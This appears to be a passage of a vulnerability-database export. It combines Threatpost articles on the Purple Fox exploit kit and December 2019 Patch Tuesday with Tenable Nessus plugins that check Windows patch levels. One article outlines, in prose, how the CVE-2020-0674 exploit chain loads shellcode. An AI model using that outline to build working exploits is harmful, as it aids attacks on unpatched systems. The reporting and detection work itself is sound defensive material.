Since then, further analysis of the flaw has been [published](<https://labs.f-secure.com/blog/internet-exploiter-understanding-vulnerabilities-in-internet-explorer>) and proof-of-concept (PoC) code has been [released](<https://github.com/maxpl0it/CVE-2020-0674-Exploit>), said researchers.\n\nCVE-2019-1458 meanwhile is a high-severity [elevation-of-privilege vulnerability](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) in Win32k, which has a zero-day exploit circulating in the wild (used in attacks including [Operation WizardOpium](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)). The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said. The flaw, which has a CVSS score of 7.8 out of 10, was [fixed](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>) by Microsoft as part of its December Patch Tuesday release.\n\n## **Purple Fox**\n\nResearchers discovered a malvertising campaign in late June that utilized the Purple Fox EK, successfully exploiting Internet Explorer 11 via CVE-2020-0674 on Windows 10. The exploit used for CVE-2020-0674 targets Internet Explorer\u2019s usage of jscript.dll, a library required for Windows to operate. At the start of the exploit process, the malicious script attempts to leak an address from the RegExp implementation within jscript.dll.\n\nWith that leaked address, the malicious JavaScript code then searches for the PE header of jscript.dll, and then uses that header to locate an import descriptor for kernel32.dll. That contains the process and memory manipulation functions required for the EK to load the actual shellcode.\n\n\u201cIn particular, the function GetModuleHandleA is used to obtain the running module handle,\u201d said researchers. 
\u201cThis handle is used along with GetProcAddress to locate VirtualProtect, which is in turn used to enable \u2018read, write, execute\u2019 (RWX) permissions on the shellcode. Finally, the shellcode is triggered by calling an overwritten implementation of RegExp::test.\u201d\n\nThe shellcode then locates WinExec to create a new process, which begins the actual execution of the malware.\n\n## **EK Future**\n\nWhile exploit kits are [not as popular as they were](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) a few years ago, researchers stress that they are [still part of the](<https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/>) threat landscape, with EKs like [Fallout and Rig continually retooling](<https://threatpost.com/fallout-ek-retools/141027/>).\n\n\u201cOne thing that hasn\u2019t changed regarding exploit kits is the way in which exploit-kit authors regularly update to include new attacks against newly discovered vulnerabilities,\u201d researchers said.\n\nBy building their own EK for distribution, the authors of the Purple Fox malware have been able to save money by no longer paying for the Rig EK. This shows that the attackers behind the Purple Fox malware are taking a \u201cprofessional approach\u201d by looking to save money and keep their product current, researchers said.\n\n\u201cThe fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business,\u201d they said. \u201cIn essence, the authors behind the Purple Fox malware decided to bring development \u2018in-house\u2019 to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism \u2018in-house\u2019 also enables greater control over what the EK actually loads.\u201d\n", "modified": "2020-07-06T15:21:30", "published": "2020-07-06T15:21:30", "id": "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "href": "https://threatpost.com/microsoft-exploits-purple-fox-ek/157157/", "type": "threatpost", "title": "Purple Fox EK Adds Microsoft Exploits to Arsenal", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:40:13", "bulletinFamily": "info", "cvelist": ["CVE-2019-0859", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1471"], "description": "Microsoft has issued fixes for 36 CVEs for December 2019 Patch Tuesday across a range of products, with seven of them rated critical in severity \u2013 and one that\u2019s already being exploited in the wild as a zero-day bug.\n\nThe computing giant\u2019s [scheduled security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2019-Dec>) this month is relatively light, and includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business. 
In all, December Patch Tuesday addressed seven bugs that are rated critical, 28 that are rated important, and one that is rated moderate in severity.\n\n## Zero-Day Bug Exploited in the Wild\n\n[CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k, which has a live zero-day exploit circulating in the wild. The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n\u201cAn attacker could exploit the flaw to execute arbitrary code in kernel mode on the victim\u2019s system,\u201d said Satnam Narang, senior research engineer at Tenable, via email. \u201cFrom there, the attacker could perform a variety of actions, such as creating a new account with full user rights, installing programs, and viewing, changing or deleting data.\u201d\n\nThe one caveat is that to exploit the flaw, an attacker would need to have previously compromised the system using another vulnerability \u2013 thus, it\u2019s rated only as important in severity and carries a CVSSv3 base score of 7.8 out of 10. However, since it has been exploited in the wild as a zero-day, IT security staff should prioritize the patch, researchers said.\n\n\u201cThis is one of many vulnerabilities that Microsoft resolved in 2019 that were being exploited but were not rated as a critical severity,\u201d said Chris Goettl, director of product management, Security, at Ivanti, via email. 
\u201cIf your vulnerability-management criteria use vendor severity or CVSS score as criteria for determining what should be updated, you should re-evaluate your criteria to ensure exploited vulnerabilities like this do not slip past your prioritization process.\u201d\n\nThe zero-day was found by Kaspersky researchers as a result of a separate zero-day exploit for Google Chrome that was seen in November, being used to execute arbitrary code on a victim\u2019s machine. The newly discovered Windows EoP was embedded into a previously discovered Google Chrome exploit, the firm said: \u201cIt was used to gain higher privileges in the infected machine as well as to escape the Chrome process sandbox \u2013 a component built to protect the browser and the victim\u2019s computer from malicious attacks.\u201d\n\nThe exploits are being used by a threat group called \u201cWizardOpium.\u201d\n\nMicrosoft has addressed the vulnerability by correcting how Win32k handles objects in memory. The flaw is also similar to the CVE-2019-0859 bug reported in April, for which an exploit was developed and found being sold on [underground markets](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>).\n\n## Critical Bugs\n\nIn terms of the critical bugs included in this month\u2019s Patch Tuesday, a critical remote code-execution (RCE) vulnerability in Win32k Graphics ([CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&epi=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00>)) would allow an adversary to create a new account with full user rights, install programs, and view, change or delete data. 
It exists due to the Windows font library improperly handling specially crafted embedded fonts. Attack vectors would be via a malicious document, or by luring users to a specially crafted website containing the exploit code.\n\n\u201cTo exploit the vulnerability, an attacker would need to run a specially crafted application on the guest operating system, resulting in execution of arbitrary code on the host operating system,\u201d said Narang.\n\nAlso on the RCE front, critical-rated [CVE-2019-1471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1471>) in Windows Hyper-V exists due to improper validation of inputs from an authenticated user on the guest operating system by the host server.\n\n\u201cThis critical-rated patch fixes a bug in Hyper-V that would allow a user on a guest OS to execute arbitrary code on the underlying host OS,\u201d explained Dustin Childs, researcher with Trend Micro\u2019s Zero-Day Initiative. \u201cBugs like this have been demonstrated at Pwn2Own in the past, and they\u2019re always fun to watch. 
Considering how much modern computing depends on virtualization, it\u2019s likely we\u2019ll continue to see research that focuses on exploiting the hypervisor from a guest OS.\u201d\n\nMicrosoft also announced five critical vulnerabilities for Microsoft\u2019s Git for Visual Studio 2017 and 2019 (CVE-2019-1349, CVE-2019-1350, CVE-2019-1352, CVE-2019-1354, CVE-2019-1387).\n\nThe description for all of them [is identical:](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1349>) an RCE bug that exists when Git for Visual Studio client improperly sanitizes input (sanitization is the process of modifying input to ensure that it is actually valid).\n\n\u201cAs Visual Studio is one of the most popular development environments used today to design and build applications, this exploit puts engineering organizations on the front lines of a potential attack,\u201d explained Richard Melick, senior technology product manager at Automox, via email. \u201cIf left unpatched, engineering and development groups would be at risk to being the point of entry for malware deployment, lateral movement through the network, rogue account creation, and theft of proprietary application code.\u201d\n\nIn order to exploit any of these Visual Studio vulnerabilities, an attacker would need to use the Git client to download a malicious repository to the victim\u2019s endpoint.\n\n\u201cWhile not common, it is still possible using fairly simple techniques,\u201d Melick said. \u201cBy running intelligence gathering in channels like LinkedIn and job listings, an attacker could learn about an organization\u2019s use of Visual Studio and the details of the open-source projects in play. From there, entry into the network could come through a common phishing email technique to the engineering for help troubleshooting a compatibility issue with their open-source software, providing a link to the Git repository, or even for an interview as an example of previous work. 
The engineering team would then download the malicious repo, allowing the malicious code to execute, giving attacker access.\u201d\n\n## Additional Notes\n\nOne other bug that stood out to researchers in the update is [CVE-2019-1469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1469>), an important-rated Win32k information disclosure vulnerability that exists when a Win32k component improperly provides kernel information.\n\n\u201cA successful attack through this vulnerability could result in private data being revealed to an attacker, providing necessary information to further compromise the victim\u2019s system,\u201d Melick said. \u201cA successful attack relies on access to the machine to load a specially crafted application.\u201d\n\nAnd finally, it\u2019s also worth mentioning that there is only one Patch Tuesday left (in January) until Windows 7 and Server 2008/2008 R2 reach end-of-life and Microsoft stops issuing security fixes for them.\n\n\u201cThere is no doubt we are going to see a similar situation to the Windows XP end-of-service with a large number of these machines still in use and not updated,\u201d Melick said. \u201cIt is safe to assume that many of these machines in this bucket are falling under unmanaged or mission-critical categories with no clear path to update.\u201d\n\nAlso on Patch Tuesday, [Adobe issued fixes for 17 critical vulnerabilities](<https://threatpost.com/adobe-fixes-critical-acrobat-photoshop-brackets-flaws/150970/>) in Acrobat Reader, Photoshop and Brackets, which could lead to arbitrary code execution if exploited.\n", "modified": "2019-12-10T21:21:24", "published": "2019-12-10T21:21:24", "id": "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "href": "https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/", "type": "threatpost", "title": "Microsoft Zaps Actively Exploited Zero-Day Bug", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:27:15", "description": "The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. 
An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Forefront Endpoint Protection (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:system_center_endpoint_protection"], "id": "SMB_NT_MS21_JAN_FEP.NASL", "href": "https://www.tenable.com/plugins/nessus/144886", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144886);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Forefront Endpoint Protection (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. 
Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:system_center_endpoint_protection\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"fep_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Forefront Endpoint Protection';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if we got tyhe Malware Engine Version\nif (isnull(app_info['engine_version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'engine_version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:27:16", "description": "The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. 
An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Windows Defender (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:windows_defender"], "id": "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "href": "https://www.tenable.com/plugins/nessus/144876", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144876);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Windows Defender (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. 
Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_defender\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/svcs\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Windows Defender';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if disabled\nif (!isnull(app_info['Disabled']))\n exit(0,'Windows Defender is disabled.');\n\n# Check if we got tyhe Malware Engine Version\nif (isnull(app_info['Engine Version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'Engine Version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-02T14:45:44", "description": "The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. 
An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598297: Windows Server 2012 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2020-17087", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598278.NASL", "href": "https://www.tenable.com/plugins/nessus/144881", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144881);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/01\");\n\n script_cve_id(\n \"CVE-2020-17087\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598278\");\n script_xref(name:\"MSKB\", value:\"4598297\");\n script_xref(name:\"MSFT\", value:\"MS21-4598278\");\n script_xref(name:\"MSFT\", value:\"MS21-4598297\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598297: Windows Server 2012 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n # https://support.microsoft.com/en-us/help/4598278/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bbb76f59\");\n # https://support.microsoft.com/en-us/help/4598297/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b71d9485\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598297 or Cumulative Update KB4598278.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598278', '4598297'); # changed by manual execution of PT scriptsautomation\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598297, 4598278])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
